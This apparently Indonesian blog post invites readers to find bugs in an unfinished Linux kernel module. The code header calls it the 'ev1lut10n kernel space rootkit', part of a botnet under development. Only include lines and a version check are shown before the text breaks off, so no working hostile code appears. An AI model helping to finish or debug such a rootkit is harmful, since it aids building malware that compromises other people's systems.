Space Iklan Space Iklan Space Iklan Space Iklan

try to analyze this unfinished lkm

Bookmark and Share
try to analyze this unfinished lkm
well this is unfinished code of an lkm, because it's unfinished so it will contains some buggy and mistakes, try to find the buggy and mistakes from this c code

=================
/***
ev1lut10n kernel space rootkit
this rootkit just a module of current botnet development
**/
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/moduleparam.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/types.h>
#include <linux/version.h>
#if(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,33))
#include <generated/autoconf.h>
#else
#include <linux/autoconf.h>
 
beritasehari